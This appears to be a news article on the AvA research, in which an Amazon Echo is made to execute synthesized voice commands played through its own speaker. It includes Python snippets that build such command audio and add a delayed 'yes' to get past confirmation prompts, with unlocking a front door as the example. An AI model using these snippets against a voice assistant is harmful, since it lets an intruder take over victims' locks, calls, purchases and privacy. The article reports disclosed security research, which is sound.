A group of researchers from the University of Catania and Royal Holloway, University of London has discovered a method to make Amazon Echo devices “hack themselves”. In a nutshell, the problem is that the device recognizes and executes voice commands played through its own speaker; an attacker merely needs to pair a Bluetooth device with the Echo, after which they can fabricate any command they want, even by typing it, thanks to text-to-speech.
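To make the mechanism concrete, here is a minimal sketch of how such a self-issued command could be produced with off-the-shelf text-to-speech. This is our illustration, not the researchers' code: the gTTS library, the example command, and the playback step are all assumptions.

```python
# Illustrative sketch only: synthesizing a spoken Alexa command with an
# off-the-shelf TTS library (gTTS is an assumption, not necessarily the
# tool used in the research). Streamed over the Bluetooth pairing
# described above, the clip plays back through the Echo's own speaker,
# which then recognizes and executes it.
from gtts import gTTS  # pip install gTTS

command = "Alexa, turn off the living room lights"  # hypothetical command
gTTS(text=command, lang="en").save("command.mp3")

# Once the attacker's machine is paired as the Echo's Bluetooth audio
# source, any media player can route the clip through the device, e.g.:
#   mpv command.mp3
```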
The demonstration video embedded below shows several actions and scenarios made possible by the attack. For example, the attacker can:
- Control other smart devices: shutters, intercoms, thermostats, microwaves and other appliances, even door locks. Many of these commands require explicit confirmation before they run, but this limitation is easy to bypass: the attacker simply appends a “yes” to the text-to-speech output a few seconds later (see the sketch after this list).
- Call any phone number, including one controlled by the attacker.
- Make unauthorized purchases.
- Change calendars or other personal settings.
- Install and launch unsolicited skills, including, for example, ones capable of intercepting conversations and every voice command uttered by the victim.
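As a rough illustration of the confirmation bypass mentioned in the first item, the snippet below stitches the command, a few seconds of silence, and a synthesized “yes” into a single audio payload. Again, this is a hedged reconstruction: the gTTS and pydub libraries, the 4-second pause, and the example command are our assumptions, not details from the paper.

```python
# Hedged reconstruction of the delayed-"yes" trick (not the researchers'
# code): the command clip is followed by silence long enough for Alexa's
# confirmation prompt, then by a synthesized "yes" from the same stream.
from gtts import gTTS            # pip install gTTS
from pydub import AudioSegment   # pip install pydub (requires ffmpeg)

gTTS(text="Alexa, unlock the front door", lang="en").save("cmd.mp3")  # hypothetical
gTTS(text="yes", lang="en").save("yes.mp3")

payload = (AudioSegment.from_mp3("cmd.mp3")
           + AudioSegment.silent(duration=4000)  # assumed prompt delay
           + AudioSegment.from_mp3("yes.mp3"))
payload.export("payload.mp3", format="mp3")
```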
By its very nature, the attack has significant technical limitations: in the very first phase, pairing, the attacker must be within useful range for voice recognition, which essentially means in the same room as the device.
Furthermore, the Bluetooth device carrying the attack must remain within the radio's range at all times, which is roughly ten meters. One can also argue that if the rightful owner is near the speaker and hears it uttering and executing commands, they will obviously become suspicious, so the attacker must monitor the victim rather closely.
The scenario is not impossible, of course; think, for example, of domestic abuse, or of espionage and rivalry in the workplace. All things considered, Amazon rated the risk level of the vulnerability, which the researchers call AvA (Alexa vs. Alexa), as “medium”.
That said, Amazon has already fixed some of the most serious flaws, in particular the one enabling the man-in-the-middle (MITM) attack demonstrated in the video at around the 1:40 mark.